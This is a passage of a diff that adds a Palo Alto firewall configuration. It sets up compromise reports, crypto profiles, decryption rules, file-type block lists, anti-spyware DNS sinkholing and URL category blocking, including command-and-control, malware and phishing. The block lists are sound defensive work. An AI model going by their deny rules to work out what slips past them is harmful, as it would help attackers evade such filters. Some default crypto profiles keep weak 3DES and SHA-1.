+        <topm>50</topm>
+        <caption>Host-visit quest sites plus</caption>
+        <frequency>daily</frequency>
+        <query>(category eq dynamic-dns) and (category eq parked) and (category eq questionable) and (category eq unknown)</query>
+        <description>Detail of hosts visiting questionable URLs</description>
+        <type>
+          <url>
+            <sortby>repeatcnt</sortby>
+            <group-by>src</group-by>
+            <aggregate-by>
+              <member>from</member>
+              <member>srcuser</member>
+              <member>category</member>
+              <member>action</member>
+            </aggregate-by>
+            <values>
+              <member>repeatcnt</member>
+            </values>
+          </url>
+        </type>
+      </entry>
+      <entry name="Wildfire malicious verdicts">
+        <period>last-30-calendar-days</period>
+        <topn>500</topn>
+        <topm>10</topm>
+        <caption>Wildfire malicious verdicts</caption>
+        <frequency>daily</frequency>
+        <query>(app neq smtp) and (category neq benign)</query>
+        <description>Files uploaded or downloaded that were later found to be malicious. This is a summary. Act on real-time email.</description>
+        <type>
+          <wildfire>
+            <sortby>repeatcnt</sortby>
+            <aggregate-by>
+              <member>filedigest</member>
+              <member>container-of-app</member>
+              <member>app</member>
+              <member>category</member>
+              <member>filetype</member>
+              <member>rule</member>
+            </aggregate-by>
+            <values>
+              <member>repeatcnt</member>
+            </values>
+          </wildfire>
+        </type>
+      </entry>
+      <entry name="Wildfire verdicts SMTP">
+        <period>last-30-calendar-days</period>
+        <topn>500</topn>
+        <topm>10</topm>
+        <caption>Wildfire verdicts SMTP</caption>
+        <frequency>daily</frequency>
+        <query>(app eq smtp) and (category neq benign)</query>
+        <description>Links sent from emails found to be malicious. </description>
+        <type>
+          <wildfire>
+            <sortby>repeatcnt</sortby>
+            <aggregate-by>
+              <member>filedigest</member>
+              <member>container-of-app</member>
+              <member>app</member>
+              <member>category</member>
+              <member>filetype</member>
+              <member>rule</member>
+              <member>subject</member>
+              <member>sender</member>
+              <member>recipient</member>
+              <member>misc</member>
+            </aggregate-by>
+          </wildfire>
+        </type>
+      </entry>
+      <entry name="Clients sinkholed">
+        <period>last-30-calendar-days</period>
+        <topn>500</topn>
+        <topm>50</topm>
+        <caption>Clients sinkholed</caption>
+        <query>(rule eq 'DNS Sinkhole Block')</query>
+        <frequency>daily</frequency>
+        <type>
+          <traffic>
+            <sortby>repeatcnt</sortby>
+            <group-by>from</group-by>
+            <aggregate-by>
+              <member>src</member>
+              <member>srcuser</member>
+            </aggregate-by>
+            <values>
+              <member>repeatcnt</member>
+            </values>
+          </traffic>
+        </type>
+      </entry>
+    </reports>
+    <report-group>
+      <entry name="Possible Compromise">
+        <custom-widget>
+          <entry name="1">
+            <custom-report>Clients sinkholed</custom-report>
+          </entry>
+          <entry name="2">
+            <custom-report>Wildfire malicious verdicts</custom-report>
+          </entry>
+          <entry name="3">
+            <custom-report>Wildfire verdicts SMTP</custom-report>
+          </entry>
+          <entry name="4">
+            <custom-report>Hosts visit malicious sites</custom-report>
+          </entry>
+          <entry name="5">
+            <custom-report>Host-visit malicious sites plus</custom-report>
+          </entry>
+          <entry name="6">
+            <custom-report>Hosts visit questionable sites</custom-report>
+          </entry>
+          <entry name="7">
+            <custom-report>Host-visit quest sites plus</custom-report>
+          </entry>
+        </custom-widget>
+        <title-page>yes</title-page>
+        <variable>
+          <entry name="title">
+            <value>Possible Compromise</value>
+          </entry>
+        </variable>
+      </entry>
+    </report-group>
+    <email-scheduler>
+      <entry name="Possbile Compromise">
+        <report-group>Possible Compromise</report-group>
+        <recurring>
+          <disabled/>
+        </recurring>
+        <email-profile>Sample_Email_Profile</email-profile>
+      </entry>
+    </email-scheduler>
+    <content-preview>
+      <application/>
+      <application-type>
+        <category/>
+        <technology/>
+      </application-type>
+    </content-preview>
+  </shared>
+  <devices>
+    <entry name="localhost.localdomain">
+      <network>
+        <interface>
+          <ethernet/>
+        </interface>
+        <profiles>
+          <monitor-profile>
+            <entry name="default">
+              <interval>3</interval>
+              <threshold>5</threshold>
+              <action>wait-recover</action>
+            </entry>
+          </monitor-profile>
+          <zone-protection-profile>
+            <entry name="Recommended_Zone_Protection">
+              <flood>
+                <tcp-syn>
+                  <red>
+                    <alarm-rate>10000</alarm-rate>
+                    <activate-rate>10000</activate-rate>
+                    <maximal-rate>40000</maximal-rate>
+                  </red>
+                  <enable>no</enable>
+                </tcp-syn>
+                <icmp>
+                  <red>
+                    <alarm-rate>10000</alarm-rate>
+                    <activate-rate>10000</activate-rate>
+                    <maximal-rate>40000</maximal-rate>
+                  </red>
+                  <enable>no</enable>
+                </icmp>
+                <icmpv6>
+                  <red>
+                    <alarm-rate>10000</alarm-rate>
+                    <activate-rate>10000</activate-rate>
+                    <maximal-rate>40000</maximal-rate>
+                  </red>
+                  <enable>no</enable>
+                </icmpv6>
+                <other-ip>
+                  <red>
+                    <alarm-rate>10000</alarm-rate>
+                    <activate-rate>10000</activate-rate>
+                    <maximal-rate>40000</maximal-rate>
+                  </red>
+                  <enable>no</enable>
+                </other-ip>
+                <udp>
+                  <red>
+                    <alarm-rate>10000</alarm-rate>
+                    <activate-rate>10000</activate-rate>
+                    <maximal-rate>40000</maximal-rate>
+                  </red>
+                  <enable>no</enable>
+                </udp>
+              </flood>
+              <scan>
+                <entry name="8001">
+                  <action>
+                    <alert/>
+                  </action>
+                  <interval>2</interval>
+                  <threshold>100</threshold>
+                </entry>
+                <entry name="8002">
+                  <action>
+                    <alert/>
+                  </action>
+                  <interval>10</interval>
+                  <threshold>100</threshold>
+                </entry>
+                <entry name="8003">
+                  <action>
+                    <alert/>
+                  </action>
+                  <interval>2</interval>
+                  <threshold>100</threshold>
+                </entry>
+              </scan>
+              <discard-ip-spoof>yes</discard-ip-spoof>
+              <discard-malformed-option>yes</discard-malformed-option>
+              <remove-tcp-timestamp>yes</remove-tcp-timestamp>
+              <strip-tcp-fast-open-and-data>no</strip-tcp-fast-open-and-data>
+              <strip-mptcp-option>global</strip-mptcp-option>
+            </entry>
+          </zone-protection-profile>
+          <interface-management-profile/>
+        </profiles>
+        <ike>
+          <crypto-profiles>
+            <ike-crypto-profiles>
+              <entry name="default">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                  <member>3des</member>
+                </encryption>
+                <hash>
+                  <member>sha1</member>
+                </hash>
+                <dh-group>
+                  <member>group2</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-128">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <hash>
+                  <member>sha256</member>
+                </hash>
+                <dh-group>
+                  <member>group19</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-256">
+                <encryption>
+                  <member>aes-256-cbc</member>
+                </encryption>
+                <hash>
+                  <member>sha384</member>
+                </hash>
+                <dh-group>
+                  <member>group20</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+            </ike-crypto-profiles>
+            <ipsec-crypto-profiles>
+              <entry name="default">
+                <esp>
+                  <encryption>
+                    <member>aes-128-cbc</member>
+                    <member>3des</member>
+                  </encryption>
+                  <authentication>
+                    <member>sha1</member>
+                  </authentication>
+                </esp>
+                <dh-group>group2</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-128">
+                <esp>
+                  <encryption>
+                    <member>aes-128-gcm</member>
+                  </encryption>
+                  <authentication>
+                    <member>none</member>
+                  </authentication>
+                </esp>
+                <dh-group>group19</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-256">
+                <esp>
+                  <encryption>
+                    <member>aes-256-gcm</member>
+                  </encryption>
+                  <authentication>
+                    <member>none</member>
+                  </authentication>
+                </esp>
+                <dh-group>group20</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+            </ipsec-crypto-profiles>
+            <global-protect-app-crypto-profiles>
+              <entry name="default">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <authentication>
+                  <member>sha1</member>
+                </authentication>
+              </entry>
+            </global-protect-app-crypto-profiles>
+          </crypto-profiles>
+        </ike>
+        <qos>
+          <profile>
+            <entry name="default">
+              <class>
+                <entry name="class1">
+                  <priority>real-time</priority>
+                </entry>
+                <entry name="class2">
+                  <priority>high</priority>
+                </entry>
+                <entry name="class3">
+                  <priority>high</priority>
+                </entry>
+                <entry name="class4">
+                  <priority>medium</priority>
+                </entry>
+                <entry name="class5">
+                  <priority>medium</priority>
+                </entry>
+                <entry name="class6">
+                  <priority>low</priority>
+                </entry>
+                <entry name="class7">
+                  <priority>low</priority>
+                </entry>
+                <entry name="class8">
+                  <priority>low</priority>
+                </entry>
+              </class>
+            </entry>
+          </profile>
+        </qos>
+        <virtual-router>
+          <entry name="default">
+            <admin-dists/>
+            <interface/>
+          </entry>
+        </virtual-router>
+      </network>
+      <deviceconfig>
+        <system>
+          <hostname>WebFW1</hostname>
+          <timezone>UTC</timezone>
+          <update-server>updates.paloaltonetworks.com</update-server>
+          <server-verification>yes</server-verification>
+          <dns-setting>
+            <servers>
+              <primary>8.8.8.8</primary>
+              <secondary>10.0.0.2</secondary>
+            </servers>
+          </dns-setting>
+          <login-banner>Gold 1.0 - PANOS 8.0</login-banner>
+          <service>
+            <disable-telnet>yes</disable-telnet>
+            <disable-http>yes</disable-http>
+          </service>
+          <snmp-setting>
+            <access-setting>
+              <version>
+                <v3/>
+              </version>
+            </access-setting>
+          </snmp-setting>
+          <type>
+            <dhcp-client>
+              <send-hostname>yes</send-hostname>
+              <send-client-id>no</send-client-id>
+              <accept-dhcp-hostname>no</accept-dhcp-hostname>
+              <accept-dhcp-domain>no</accept-dhcp-domain>
+            </dhcp-client>
+          </type>
+          <update-schedule>
+            <threats>
+              <recurring>
+                <daily>
+                  <at>00:00</at>
+                  <action>download-and-install</action>
+                </daily>
+                <threshold>48</threshold>
+              </recurring>
+            </threats>
+            <statistics-service>
+              <application-reports>yes</application-reports>
+              <threat-prevention-reports>yes</threat-prevention-reports>
+              <threat-prevention-pcap>yes</threat-prevention-pcap>
+              <threat-prevention-information>yes</threat-prevention-information>
+              <passive-dns-monitoring>yes</passive-dns-monitoring>
+              <url-reports>yes</url-reports>
+              <health-performance-reports>yes</health-performance-reports>
+              <file-identification-reports>yes</file-identification-reports>
+            </statistics-service>
+            <anti-virus>
+              <recurring>
+                <hourly>
+                  <at>3</at>
+                  <action>download-and-install</action>
+                </hourly>
+              </recurring>
+            </anti-virus>
+          </update-schedule>
+        </system>
+        <setting>
+          <config>
+            <rematch>yes</rematch>
+          </config>
+          <management>
+            <hostname-type-in-syslog>FQDN</hostname-type-in-syslog>
+            <initcfg>
+              <type>
+                <dhcp-client>
+                  <send-hostname>yes</send-hostname>
+                  <send-client-id>no</send-client-id>
+                  <accept-dhcp-hostname>no</accept-dhcp-hostname>
+                  <accept-dhcp-domain>no</accept-dhcp-domain>
+                </dhcp-client>
+              </type>
+              <public-key>c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDR3ZDNHZmYk1JbXVSSTlnNGx5SkJRQ0NNSUFjZk0wemVMM2VFM0REdlRkRmYrYzZLOHVJUlRwUk01MHo0TVEwTXd1TEo0Rk1iclQ5ZVRsaEZaZitYcjVBZzJ2R2xIRE9zcEEwSWtmbzZXaTBwYnQ1d1hYV1YwOCs1Tk9GRkpXNm13YThvWUV3RUtHZWlDTEJnRWMyRTgzaXo3alNiNkRST3hXakxDOWVkZmR0ZmNTSzhlNW1kbmRZUkVMK3ZoaSt1QUZac0RpTEhMWGNpeFlaU0xML0xvcmIzK2hnOVdsejQwR0IwMmVsRk1Oc3hJSFdzVUQxMDFVelJzWWFxYWVVWjRuNDlxOVhtc1ZxazVkbHRhcTdtYitWNTZqaVBvVG1wZGNjNjZycGtqWFNjK2NFWGMzaitNbUFRd1F5RkFjbDI2dzlGb3pvUmo4MmY0REx3SncwaEIgamZyYW5rbGluMg==</public-key>
+              <dns-primary>8.8.8.8</dns-primary>
+              <dns-secondary>8.8.4.4</dns-secondary>
+            </initcfg>
+          </management>
+          <ctd>
+            <strip-x-fwd-for>yes</strip-x-fwd-for>
+            <x-forwarded-for>yes</x-forwarded-for>
+          </ctd>
+          <wildfire>
+            <file-size-limit>
+              <entry name="pe">
+                <size-limit>10</size-limit>
+              </entry>
+              <entry name="apk">
+                <size-limit>30</size-limit>
+              </entry>
+              <entry name="pdf">
+                <size-limit>1000</size-limit>
+              </entry>
+              <entry name="ms-office">
+                <size-limit>2000</size-limit>
+              </entry>
+              <entry name="jar">
+                <size-limit>5</size-limit>
+              </entry>
+              <entry name="flash">
+                <size-limit>5</size-limit>
+              </entry>
+              <entry name="MacOSX">
+                <size-limit>1</size-limit>
+              </entry>
+              <entry name="archive">
+                <size-limit>10</size-limit>
+              </entry>
+              <entry name="linux">
+                <size-limit>2</size-limit>
+              </entry>
+            </file-size-limit>
+            <report-benign-file>yes</report-benign-file>
+            <report-grayware-file>yes</report-grayware-file>
+          </wildfire>
+          <application>
+            <notify-user>yes</notify-user>
+          </application>
+          <logging>
+            <log-suppression>no</log-suppression>
+          </logging>
+        </setting>
+      </deviceconfig>
+      <vsys>
+        <entry name="vsys1">
+          <application>
+            <entry name="elb-healthchecker">
+              <signature>
+                <entry name="elb-healthchecker-signature">
+                  <and-condition>
+                    <entry name="And Condition 1">
+                      <or-condition>
+                        <entry name="Or Condition 1">
+                          <operator>
+                            <pattern-match>
+                              <pattern>ELB-HealthChecker/2.0</pattern>
+                              <context>http-req-headers</context>
+                            </pattern-match>
+                          </operator>
+                        </entry>
+                      </or-condition>
+                    </entry>
+                  </and-condition>
+                  <scope>session</scope>
+                  <order-free>no</order-free>
+                </entry>
+              </signature>
+              <subcategory>infrastructure</subcategory>
+              <category>networking</category>
+              <technology>browser-based</technology>
+              <risk>1</risk>
+            </entry>
+            <entry name="google-health-check">
+              <default>
+                <port>
+                  <member>tcp/80</member>
+                </port>
+              </default>
+              <signature>
+                <entry name="google-health-check">
+                  <and-condition>
+                    <entry name="And Condition 1">
+                      <or-condition>
+                        <entry name="Or Condition 1">
+                          <operator>
+                            <pattern-match>
+                              <qualifier>
+                                <entry name="http-method">
+                                  <value>GET</value>
+                                </entry>
+                              </qualifier>
+                              <pattern>GoogleHC/</pattern>
+                              <context>http-req-headers</context>
+                            </pattern-match>
+                          </operator>
+                        </entry>
+                      </or-condition>
+                    </entry>
+                  </and-condition>
+                  <scope>session</scope>
+                  <order-free>no</order-free>
+                </entry>
+              </signature>
+              <subcategory>ip-protocol</subcategory>
+              <category>networking</category>
+              <technology>client-server</technology>
+              <risk>1</risk>
+            </entry>
+          </application>
+          <application-group/>
+          <zone/>
+          <service/>
+          <service-group/>
+          <schedule/>
+          <rulebase>
+            <default-security-rules>
+              <rules>
+                <entry name="intrazone-default">
+                  <action>allow</action>
+                  <log-start>no</log-start>
+                  <log-end>yes</log-end>
+                  <profile-setting>
+                    <group>
+                      <member>Inbound</member>
+                    </group>
+                  </profile-setting>
+                  <log-setting>default</log-setting>
+                </entry>
+                <entry name="interzone-default">
+                  <action>deny</action>
+                  <log-start>no</log-start>
+                  <log-end>yes</log-end>
+                  <log-setting>default</log-setting>
+                </entry>
+              </rules>
+            </default-security-rules>
+            <security>
+              <rules/>
+            </security>
+            <decryption>
+              <rules>
+                <entry name="NO-Decrypt URL Categories">
+                  <category>
+                    <member>financial-services</member>
+                    <member>government</member>
+                    <member>health-and-medicine</member>
+                    <member>Custom-No-Decrypt</member>
+                  </category>
+                  <service>
+                    <member>any</member>
+                  </service>
+                  <type>
+                    <ssl-forward-proxy/>
+                  </type>
+                  <from>
+                    <member>any</member>
+                  </from>
+                  <to>
+                    <member>any</member>
+                  </to>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <profile>Recommended_Decryption_Profile</profile>
+                  <action>no-decrypt</action>
+                  <disabled>yes</disabled>
+                  <description>This rule does not do Decryption.  This rule is validating SSL Protocol Communications.</description>
+                </entry>
+                <entry name="NO-Decrypt Rule">
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <service>
+                    <member>any</member>
+                  </service>
+                  <type>
+                    <ssl-forward-proxy/>
+                  </type>
+                  <from>
+                    <member>any</member>
+                  </from>
+                  <to>
+                    <member>any</member>
+                  </to>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <profile>Recommended_Decryption_Profile</profile>
+                  <action>no-decrypt</action>
+                  <description>This rule does not do Decryption.  This rule is validating SSL Protocol Communications.</description>
+                </entry>
+              </rules>
+            </decryption>
+            <nat>
+              <rules/>
+            </nat>
+          </rulebase>
+          <tag>
+            <entry name="Outbound">
+              <comments>Outbound to the Internet</comments>
+            </entry>
+            <entry name="Inbound">
+              <comments>Inbound from the Internet</comments>
+            </entry>
+            <entry name="Internal">
+              <comments>Internal to Internal</comments>
+            </entry>
+          </tag>
+          <address>
+            <entry name="Sinkhole-IPv6">
+              <ip-netmask>2600:5200::1</ip-netmask>
+            </entry>
+            <entry name="fw-untrust">
+              <ip-netmask>10.0.1.10</ip-netmask>
+            </entry>
+          </address>
+          <external-list>
+            <entry name="Team Cymru Bogons IPv4">
+              <type>
+                <ip>
+                  <recurring>
+                    <hourly/>
+                  </recurring>
+                  <url>http://www.team-cymru.org/Services/Bogons/fullbogons-ipv4.txt</url>
+                  <description>IPv4 addresses that should not be routed across the Internet. Either reserved IP address space or unassigned and may be used for malicious purposes. More information: http://www.team-cymru.com/bogon-reference.html</description>
+                </ip>
+              </type>
+            </entry>
+            <entry name="Team Cymru Bogons IPv6">
+              <type>
+                <ip>
+                  <recurring>
+                    <hourly/>
+                  </recurring>
+                  <url>http://www.team-cymru.org/Services/Bogons/fullbogons-ipv6.txt</url>
+                  <description>IPv6 addresses that should not be routed across the Internet. Either reserved IP address space or unassigned and may be used for malicious purposes. More information: http://www.team-cymru.com/bogon-reference.html</description>
+                </ip>
+              </type>
+            </entry>
+          </external-list>
+          <profiles>
+            <custom-url-category>
+              <entry name="Black-List"/>
+              <entry name="White-List"/>
+              <entry name="Custom-No-Decrypt"/>
+            </custom-url-category>
+            <decryption>
+              <entry name="Recommended_Decryption_Profile">
+                <ssl-forward-proxy>
+                  <block-expired-certificate>yes</block-expired-certificate>
+                  <block-untrusted-issuer>yes</block-untrusted-issuer>
+                  <block-unknown-cert>yes</block-unknown-cert>
+                  <block-timeout-cert>yes</block-timeout-cert>
+                  <block-unsupported-version>yes</block-unsupported-version>
+                  <block-unsupported-cipher>yes</block-unsupported-cipher>
+                </ssl-forward-proxy>
+                <ssl-no-proxy>
+                  <block-expired-certificate>yes</block-expired-certificate>
+                  <block-untrusted-issuer>yes</block-untrusted-issuer>
+                </ssl-no-proxy>
+                <ssl-inbound-proxy>
+                  <block-unsupported-version>no</block-unsupported-version>
+                  <block-unsupported-cipher>no</block-unsupported-cipher>
+                </ssl-inbound-proxy>
+                <ssh-proxy>
+                  <block-unsupported-version>yes</block-unsupported-version>
+                  <block-unsupported-alg>yes</block-unsupported-alg>
+                </ssh-proxy>
+                <ssl-protocol-settings>
+                  <min-version>tls1-2</min-version>
+                  <keyxchg-algo-rsa>no</keyxchg-algo-rsa>
+                  <enc-algo-3des>no</enc-algo-3des>
+                  <enc-algo-rc4>no</enc-algo-rc4>
+                  <auth-algo-sha1>no</auth-algo-sha1>
+                </ssl-protocol-settings>
+              </entry>
+            </decryption>
+            <file-blocking>
+              <entry name="Outbound-FB">
+                <rules>
+                  <entry name="Alert-All">
+                    <application>
+                      <member>any</member>
+                    </application>
+                    <file-type>
+                      <member>any</member>
+                    </file-type>
+                    <direction>both</direction>
+                    <action>alert</action>
+                  </entry>
+                  <entry name="Block">
+                    <application>
+                      <member>any</member>
+                    </application>
+                    <file-type>
+                      <member>7z</member>
+                      <member>bat</member>
+                      <member>chm</member>
+                      <member>class</member>
+                      <member>cpl</member>
+                      <member>dll</member>
+                      <member>hlp</member>
+                      <member>hta</member>
+                      <member>jar</member>
+                      <member>ocx</member>
+                      <member>pif</member>
+                      <member>scr</member>
+                      <member>torrent</member>
+                      <member>vbe</member>
+                      <member>wsf</member>
+                    </file-type>
+                    <direction>both</direction>
+                    <action>block</action>
+                  </entry>
+                </rules>
+              </entry>
+              <entry name="Inbound-FB">
+                <rules>
+                  <entry name="Alert-All">
+                    <application>
+                      <member>any</member>
+                    </application>
+                    <file-type>
+                      <member>any</member>
+                    </file-type>
+                    <direction>both</direction>
+                    <action>alert</action>
+                  </entry>
+                  <entry name="Block">
+                    <application>
+                      <member>any</member>
+                    </application>
+                    <file-type>
+                      <member>7z</member>
+                      <member>bat</member>
+                      <member>chm</member>
+                      <member>class</member>
+                      <member>cpl</member>
+                      <member>dll</member>
+                      <member>hlp</member>
+                      <member>hta</member>
+                      <member>jar</member>
+                      <member>ocx</member>
+                      <member>pif</member>
+                      <member>scr</member>
+                      <member>torrent</member>
+                      <member>vbe</member>
+                      <member>wsf</member>
+                    </file-type>
+                    <direction>both</direction>
+                    <action>block</action>
+                  </entry>
+                </rules>
+              </entry>
+              <entry name="Internal-FB">
+                <rules>
+                  <entry name="Alert-All">
+                    <application>
+                      <member>any</member>
+                    </application>
+                    <file-type>
+                      <member>any</member>
+                    </file-type>
+                    <direction>both</direction>
+                    <action>alert</action>
+                  </entry>
+                  <entry name="Block">
+                    <application>
+                      <member>any</member>
+                    </application>
+                    <file-type>
+                      <member>7z</member>
+                      <member>bat</member>
+                      <member>chm</member>
+                      <member>class</member>
+                      <member>cpl</member>
+                      <member>hlp</member>
+                      <member>hta</member>
+                      <member>jar</member>
+                      <member>ocx</member>
+                      <member>pif</member>
+                      <member>scr</member>
+                      <member>torrent</member>
+                      <member>vbe</member>
+                      <member>wsf</member>
+                    </file-type>
+                    <direction>both</direction>
+                    <action>block</action>
+                  </entry>
+                </rules>
+              </entry>
+              <entry name="Alert-Only-FB">
+                <rules>
+                  <entry name="Alert-Only">
+                    <application>
+                      <member>any</member>
+                    </application>
+                    <file-type>
+                      <member>any</member>
+                    </file-type>
+                    <direction>both</direction>
+                    <action>alert</action>
+                  </entry>
+                </rules>
+              </entry>
+              <entry name="Cloud-Recommended">
+                <rules>
+                  <entry name="Alert">
+                    <application>
+                      <member>any</member>
+                    </application>
+                    <file-type>
+                      <member>any</member>
+                    </file-type>
+                    <direction>both</direction>
+                    <action>alert</action>
+                  </entry>
+                </rules>
+              </entry>
+            </file-blocking>
+            <spyware>
+              <entry name="Outbound-AS">
+                <botnet-domains>
+                  <lists>
+                    <entry name="default-paloalto-dns">
+                      <action>
+                        <sinkhole/>
+                      </action>
+                    </entry>
+                  </lists>
+                  <sinkhole>
+                    <ipv4-address>72.5.65.111</ipv4-address>
+                    <ipv6-address>2600:5200::1</ipv6-address>
+                  </sinkhole>
+                  <packet-capture>single-packet</packet-capture>
+                </botnet-domains>
+                <rules>
+                  <entry name="Block-Critical-High-Medium">
+                    <action>
+                      <reset-both/>
+                    </action>
+                    <severity>
+                      <member>high</member>
+                      <member>critical</member>
+                      <member>medium</member>
+                    </severity>
+                    <threat-name>any</threat-name>
+                    <category>any</category>
+                    <packet-capture>single-packet</packet-capture>
+                  </entry>
+                  <entry name="Default-Low-Info">
+                    <action>
+                      <default/>
+                    </action>
+                    <severity>
+                      <member>low</member>
+                      <member>informational</member>
+                    </severity>
+                    <threat-name>any</threat-name>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                </rules>
+              </entry>
+              <entry name="Inbound-AS">
+                <botnet-domains>
+                  <lists>
+                    <entry name="default-paloalto-dns">
+                      <action>
+                        <sinkhole/>
+                      </action>
+                    </entry>
+                  </lists>
+                  <sinkhole>
+                    <ipv4-address>72.5.65.111</ipv4-address>
+                    <ipv6-address>2600:5200::1</ipv6-address>
+                  </sinkhole>
+                  <packet-capture>single-packet</packet-capture>
+                </botnet-domains>
+                <rules>
+                  <entry name="Block-Critical-High-Medium">
+                    <action>
+                      <reset-both/>
+                    </action>
+                    <severity>
+                      <member>high</member>
+                      <member>critical</member>
+                      <member>medium</member>
+                    </severity>
+                    <threat-name>any</threat-name>
+                    <category>any</category>
+                    <packet-capture>single-packet</packet-capture>
+                  </entry>
+                  <entry name="Default-Low-Info">
+                    <action>
+                      <default/>
+                    </action>
+                    <severity>
+                      <member>low</member>
+                      <member>informational</member>
+                    </severity>
+                    <threat-name>any</threat-name>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                </rules>
+              </entry>
+              <entry name="Internal-AS">
+                <botnet-domains>
+                  <lists>
+                    <entry name="default-paloalto-dns">
+                      <action>
+                        <sinkhole/>
+                      </action>
+                    </entry>
+                  </lists>
+                  <sinkhole>
+                    <ipv4-address>72.5.65.111</ipv4-address>
+                    <ipv6-address>2600:5200::1</ipv6-address>
+                  </sinkhole>
+                  <packet-capture>single-packet</packet-capture>
+                </botnet-domains>
+                <rules>
+                  <entry name="Block-Critical-High">
+                    <action>
+                      <reset-both/>
+                    </action>
+                    <severity>
+                      <member>high</member>
+                      <member>critical</member>
+                    </severity>
+                    <threat-name>any</threat-name>
+                    <category>any</category>
+                    <packet-capture>single-packet</packet-capture>
+                  </entry>
+                  <entry name="Default-Medium-Low-Info">
+                    <action>
+                      <default/>
+                    </action>
+                    <severity>
+                      <member>low</member>
+                      <member>informational</member>
+                      <member>medium</member>
+                    </severity>
+                    <threat-name>any</threat-name>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                </rules>
+              </entry>
+              <entry name="Alert-Only-AS">
+                <botnet-domains>
+                  <lists>
+                    <entry name="default-paloalto-dns">
+                      <action>
+                        <alert/>
+                      </action>
+                    </entry>
+                  </lists>
+                  <sinkhole>
+                    <ipv6-address>2600:5200::1</ipv6-address>
+                  </sinkhole>
+                  <packet-capture>disable</packet-capture>
+                </botnet-domains>
+                <rules>
+                  <entry name="Alert-All">
+                    <action>
+                      <alert/>
+                    </action>
+                    <severity>
+                      <member>any</member>
+                    </severity>
+                    <threat-name>any</threat-name>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                </rules>
+              </entry>
+              <entry name="Exception-AS">
+                <botnet-domains>
+                  <lists>
+                    <entry name="default-paloalto-dns">
+                      <action>
+                        <sinkhole/>
+                      </action>
+                    </entry>
+                  </lists>
+                  <sinkhole>
+                    <ipv4-address>72.5.65.111</ipv4-address>
+                    <ipv6-address>2600:5200::1</ipv6-address>
+                  </sinkhole>
+                  <packet-capture>single-packet</packet-capture>
+                </botnet-domains>
+              </entry>
+              <entry name="Cloud-Recommended">
+                <botnet-domains>
+                  <lists>
+                    <entry name="default-paloalto-dns">
+                      <action>
+                        <sinkhole/>
+                      </action>
+                    </entry>
+                  </lists>
+                  <packet-capture>extended-capture</packet-capture>
+                  <sinkhole>
+                    <ipv4-address>pan-sinkhole-default-ip</ipv4-address>
+                    <ipv6-address>::1</ipv6-address>
+                  </sinkhole>
+                </botnet-domains>
+                <rules>
+                  <entry name="Drop">
+                    <action>
+                      <drop/>
+                    </action>
+                    <severity>
+                      <member>any</member>
+                    </severity>
+                    <threat-name>any</threat-name>
+                    <category>any</category>
+                    <packet-capture>single-packet</packet-capture>
+                  </entry>
+                </rules>
+                <threat-exception>
+                  <entry name="14984">
+                    <action>
+                      <default/>
+                    </action>
+                  </entry>
+                </threat-exception>
+              </entry>
+            </spyware>
+            <url-filtering>
+              <entry name="Outbound-URL">
+                <credential-enforcement>
+                  <mode>
+                    <ip-user/>
+                  </mode>
+                  <log-severity>high</log-severity>
+                  <block>
+                    <member>abortion</member>
+                    <member>abused-drugs</member>
+                    <member>adult</member>
+                    <member>alcohol-and-tobacco</member>
+                    <member>auctions</member>
+                    <member>business-and-economy</member>
+                    <member>command-and-control</member>
+                    <member>computer-and-internet-info</member>
+                    <member>content-delivery-networks</member>
+                    <member>copyright-infringement</member>
+                    <member>dating</member>
+                    <member>dynamic-dns</member>
+                    <member>educational-institutions</member>
+                    <member>entertainment-and-arts</member>
+                    <member>extremism</member>
+                    <member>financial-services</member>
+                    <member>gambling</member>
+                    <member>games</member>
+                    <member>government</member>
+                    <member>hacking</member>
+                    <member>health-and-medicine</member>
+                    <member>home-and-garden</member>
+                    <member>hunting-and-fishing</member>
+                    <member>insufficient-content</member>
+                    <member>internet-communications-and-telephony</member>
+                    <member>internet-portals</member>
+                    <member>job-search</member>
+                    <member>legal</member>
+                    <member>malware</member>
+                    <member>military</member>
+                    <member>motor-vehicles</member>
+                    <member>music</member>
+                    <member>news</member>
+                    <member>not-resolved</member>
+                    <member>nudity</member>
+                    <member>online-storage-and-backup</member>
+                    <member>parked</member>
+                    <member>peer-to-peer</member>
+                    <member>personal-sites-and-blogs</member>
+                    <member>philosophy-and-political-advocacy</member>
+                    <member>phishing</member>
+                    <member>private-ip-addresses</member>
+                    <member>proxy-avoidance-and-anonymizers</member>
+                    <member>questionable</member>
+                    <member>real-estate</member>
+                    <member>recreation-and-hobbies</member>
+                    <member>reference-and-research</member>
+                    <member>religion</member>
+                    <member>search-engines</member>
+                    <member>sex-education</member>
+                    <member>shareware-and-freeware</member>
+                    <member>shopping</member>
+                    <member>social-networking</member>
+                    <member>society</member>
+                    <member>sports</member>
+                    <member>stock-advice-and-tools</member>
+                    <member>streaming-media</member>
+                    <member>swimsuits-and-intimate-apparel</member>
+                    <member>training-and-tools</member>
+                    <member>translation</member>
+                    <member>travel</member>
+                    <member>unknown</member>
+                    <member>weapons</member>
